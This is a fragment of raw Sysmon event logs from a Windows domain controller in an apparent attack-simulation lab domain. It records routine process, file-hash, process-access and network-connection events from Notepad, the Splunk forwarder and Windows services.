+1981d8|C:\Windows\System32\SHELL32.dll+2845d3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+17d600 154100x80000000000000008791Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:29.241{266CAFBE-6511-6064-1401-00000000AE01}7008C:\Windows\System32\notepad.exe10.0.14393.4169 (rs1_release.210107-1130)NotepadMicrosoft® Windows® Operating SystemMicrosoft CorporationNOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Temp\1.batC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=BA78FCF8CA9D806C6C047357E31748DE,SHA256=34A07759492E31AEC2A009505FE8DFB50242375C4308AD4657B2872F4F75A077,IMPHASH=968239BE2020F1C0DAFFDCDBD49E9C82{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 23542300x80000000000000008815Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:30.726{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEF07B80DDE8227E7DC89954B2CF0E2D,SHA256=94A3495329618830A9AF224F31EB99AF99BB35291230F98C99CF72C794381B8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008816Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:31.740{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1914FFF177AE35BFFC6CE5089B455711,SHA256=C11C5E7902A8515FF2C07145BCE269F69D85181BEEBEE1E66B557A69D6338B1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008817Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:32.753{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4857CF2F07F4457CCD079535F8BBACB,SHA256=696BB406AE0805F8F4667AE08566803A41C4CB6707DE2C10B24695AC6FFE2DBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008819Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:33.845{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7FF14485EED48E32D4F4685A58996AE,SHA256=53B5CF05B5D3DC56B75AB1538CE3F852F6062F6997725A09F07C12819CB7CD6F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000008818Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:32.401{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53611-false10.0.1.12-8000- 23542300x80000000000000008820Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:34.859{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43107776B1D1E76CD26DA92E3D9AD5CC,SHA256=D02C8DAB325629F927862C82330304706FB543FD51DE9795C1E7902027F31FD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008829Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:35.873{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6498D856605206E00C0BCB5ADD092FA3,SHA256=826DF10270C595FFFE289C804628BD0FDC1FC72B33D5B1EAF38F69EAB5312065,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008828Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:35.592{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=E64AD58F55D39B246417CEFB23A66B33,SHA256=93E537EAEF9D6AB66956DF0A64AD291AFE89845109974A6F8B5CD4DB3D9566F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008827Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:35.576{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=E64AD58F55D39B246417CEFB23A66B33,SHA256=93E537EAEF9D6AB66956DF0A64AD291AFE89845109974A6F8B5CD4DB3D9566F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008826Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:35.576{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=1BDF97F8EF4B0966D9DF5063B4AA1BCA,SHA256=A07BB51C7E2C7CB3EE8F99CFDD9BF80EADFF8637FB492938B8DA5A64835C00CD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008825Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:35.498{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-64F7-6064-0801-00000000AE01}4280C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24cea|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008824Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:35.498{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-64F7-6064-0801-00000000AE01}4280C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000008823Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:33.668{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-892.attackrange.local53612-false52.177.166.224-443https 11241100x80000000000000008822Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:35.280{266CAFBE-64F7-6064-0801-00000000AE01}4280C:\Windows\system32\sppsvc.exeC:\Windows\System32\spp\store\2.0\cache\cache.dat2016-09-12 11:33:54.437 23542300x80000000000000008821Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:35.280{266CAFBE-64F7-6064-0801-00000000AE01}4280NT AUTHORITY\NETWORK SERVICEC:\Windows\system32\sppsvc.exeC:\Windows\System32\spp\store\2.0\cache\cache.datMD5=CFCAD513773CCB497FFBD0DC704C62E3,SHA256=A2A3911604B875A57CB966303E1E153E5B5CAB73F4F5905402F6E97AB2DB1C7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008832Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:36.902{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E147F1D3151330F746C7E484EA406355,SHA256=DA2BFCDA958588EB103C445EE5CBBDD5CC061D6CD471ED8B3F582EE72F274537,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008831Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:36.606{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=43583B3017127EA0A86180E48CF3BF74,SHA256=63056B139FAF00BF53BFB7FB059B085F12D1A63D2414E8F57B19615578098933,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008830Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:36.606{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=669ED54AC27B953D71B1CF4ED044C3A8,SHA256=5C5767BD82C1747EEFE0DF0F5B6CB23E34F2C086F381461DF0DBD4492F89199F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008834Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:37.994{266CAFBE-646C-6064-1000-00000000AE01}1124NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\DeviceMetadataCache\OLDCACHE.000MD5=9122C454A375CA024465FF3ABE4787B4,SHA256=C2346D518E0E6BAAC4D14FD68318E8E544E5EF5C6F79ABC5579D43EC6A8C9B7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008833Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:37.916{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A3E7EDB0D3334B468EEDAD071A3237A,SHA256=2400FFA49229B5EA852B6C08CB2A15512EE20BEEDF8F48DB79901B0B193918D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008835Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:38.946{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38C381E9F6CD9FA20B4EF04EEDB65B38,SHA256=293545D5A0CCBE62A75782D730FAC70EA51DBFF0CC1E372616918811C299713E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000008837Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:38.354{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53613-false10.0.1.12-8000- 23542300x80000000000000008836Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:39.008{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=43583B3017127EA0A86180E48CF3BF74,SHA256=63056B139FAF00BF53BFB7FB059B085F12D1A63D2414E8F57B19615578098933,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008838Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:40.006{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6B384A2CEEB4A3CA76DCB508DFADC29,SHA256=E72C4297F6CAA17592FFA12ADEF432DF6A65736221D469104ECC4B33F9FF87BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008839Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:41.051{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECC8116EA2CBE6E04494236CA620E9E2,SHA256=61F381223D41A4365DFE8108223BB76E6FED523A8700C0A3C831DD3A7F99ED65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008840Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:42.112{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C40A2BE2DB3BBD0D4A250748F43C50F,SHA256=3671EF14EC5129357B8EB7301E503C627AC4B85B3D41663D7E5E66884D19EB38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008843Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:43.719{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C6BA04DBC9D9FAAEDCC92251CEED5F99,SHA256=A2413F9A8E1E74371C6FFDD4F8A4A35CB153F7A07115F31FFB18C5DA4406421E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008842Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:43.719{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=48041AEA27714D43586BB9537D96C063,SHA256=545556BBC851E2FC1B8AD626B8EF9C378F945E1A0CBB0CD2435A21551C1C2709,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008841Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:43.126{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8864A5195AFF07D0BBA470DC44882E1,SHA256=91F4BEE62C3C441B682E54E7684F2E06CD794C540D036C1033BC8018A0970EBF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000008847Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:43.495{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53614-false10.0.1.12-8000- 11241100x80000000000000008846Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:44.546{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat2021-03-31 12:01:44.767 23542300x80000000000000008845Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:44.546{266CAFBE-646C-6064-1100-00000000AE01}1200NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=2250E80E51A43A05899F84A6FBED87EC,SHA256=ADBEFBCC563919FBDD705CA9B884BC382DB3B09D9BD6781151B262E24DD3CC61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008844Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:44.140{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38DDA9A5A8397F0CAE7856796842EB0A,SHA256=1B9A2FF095EBD7EDA078982AF9B24697D68915DE4E381C41397BFAB6E1DD1C43,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008905Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.949{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6521-6064-1B01-00000000AE01}7144C:\Windows\System32\InstallAgent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008904Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.934{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-6521-6064-1B01-00000000AE01}7144C:\Windows\System32\InstallAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008903Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.934{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008902Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.934{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008901Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.934{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008900Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.934{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008899Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.934{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6521-6064-1B01-00000000AE01}7144C:\Windows\System32\InstallAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008898Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.934{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6521-6064-1B01-00000000AE01}7144C:\Windows\System32\InstallAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008897Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.936{266CAFBE-6521-6064-1B01-00000000AE01}7144C:\Windows\System32\InstallAgent.exe10.0.14393.4169 (rs1_release.210107-1130)InstallAgentMicrosoft® Windows® Operating SystemMicrosoft CorporationInstallAgent.exeC:\Windows\System32\InstallAgent.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=88C7DCDD735B31E4F5620E4B9F38C87F,SHA256=5EF1322B96F176C4EA4B8304CAF8B45E2E42C3188AA82ED1FD6196AFC04B7297,IMPHASH=EAB6EF3DE625719627DC808B5F0501FC{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 23542300x80000000000000008896Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:45.918{266CAFBE-646C-6064-1000-00000000AE01}1124NT 